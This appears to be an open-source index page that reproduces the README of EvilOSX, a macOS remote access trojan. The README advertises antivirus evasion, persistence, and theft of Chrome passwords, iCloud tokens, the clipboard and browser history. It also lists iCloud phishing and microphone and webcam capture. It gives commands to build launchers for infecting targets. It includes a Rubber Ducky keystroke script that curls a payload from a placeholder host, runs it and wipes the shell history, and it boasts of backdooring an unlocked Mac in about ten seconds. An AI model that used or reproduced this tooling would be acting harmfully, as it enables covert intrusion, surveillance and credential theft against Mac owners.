Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/marten4n6/evilosx

An evil RAT (Remote Administration Tool) for macOS / OS X.
https://github.com/marten4n6/evilosx

backdoor mac macos macosx osx pentesting post-exploitation python python3 rat reverse-shell

Last synced: 13 days ago
JSON representation

An evil RAT (Remote Administration Tool) for macOS / OS X.

Awesome Lists containing this project

README

        




Logo


EvilOSX


An evil RAT (Remote Administration Tool) for macOS / OS X.



License


Python


Issues


Build Status


Contributing

---

[Marco Generator](https://github.com/cedowens/EvilOSX_MacroGenerator) by Cedric Owens

### This project is no longer active

## Features
- Emulate a terminal instance
- Simple extendable [module](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md) system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL [AES-256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encrypted payloads)
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- [Phish](https://i.imgur.com/x3ilHQi.png) for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation

## How To Use

```bash
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)
```

**Warning:** Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

### Advanced users

There's also a CLI for those who want to use this over SSH:
```bash
# Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s)
```

## Screenshots

![CLI](https://i.imgur.com/DGYCQMl.png)
![GUI](https://i.imgur.com/qw3k4z4.png)

## Motivation
This project was created to be used with my [Rubber Ducky](https://hakshop.com/products/usb-rubber-ducky-deluxe), here's the simple script:
```
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
```
- It takes about 10 seconds to backdoor any unlocked Mac, which is...... *nice*
- Termina**l** is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.

- To bypass the keyboard setup assistant make sure you change the VID&PID which can be found [here](https://ducktoolkit.com/vidpid/).

Aluminum Keyboard (ISO) is probably the one you are looking for.

## Versioning
EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.

Server and bot releases will be numbered with the follow format:
```
..
```

And constructed with the following guidelines:
- Breaking backward compatibility (with older bots) bumps the major
- New additions without breaking backward compatibility bumps the minor
- Bug fixes and misc changes bump the patch

For more information on SemVer, please visit https://semver.org/.

## Design Notes
- Infecting a machine is split up into three parts:
* A **launcher** is run on the target machine whose only goal is to run the stager
* The stager asks the server for a **loader** which handles how a payload will be loaded
* The loader is given a uniquely encrypted **payload** and then sent back to the stager
- The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
* Command requests are retrieved from the server via a GET request
* Command responses are sent to the server via a POST request
- Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with [zlib](https://www.zlib.net), along with any configuration options
- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline

## Issues
Feel free to submit any issues or feature requests [here](https://github.com/Marten4n6/EvilOSX/issues).

## Contributing
For a simple guide on how to create modules click [here](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md).

## Credits
- The awesome [Empire](https://github.com/EmpireProject) project
- Shoutout to [Patrick Wardle](https://twitter.com/patrickwardle) for his awesome talks, check out [Objective-See](https://objective-see.com/)
- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts

(now deleted... let me know if you reappear)
- The slowloris module is pretty much copied from [PySlowLoris](https://github.com/ProjectMayhem/PySlowLoris)
- [urwid](http://urwid.org/) and [this code](https://github.com/izderadicka/xmpp-tester/blob/master/commander.py) which saved me a lot of time with the CLI
- Logo created by [motusora](https://www.behance.net/motusora)

## License
[GPLv3](https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt)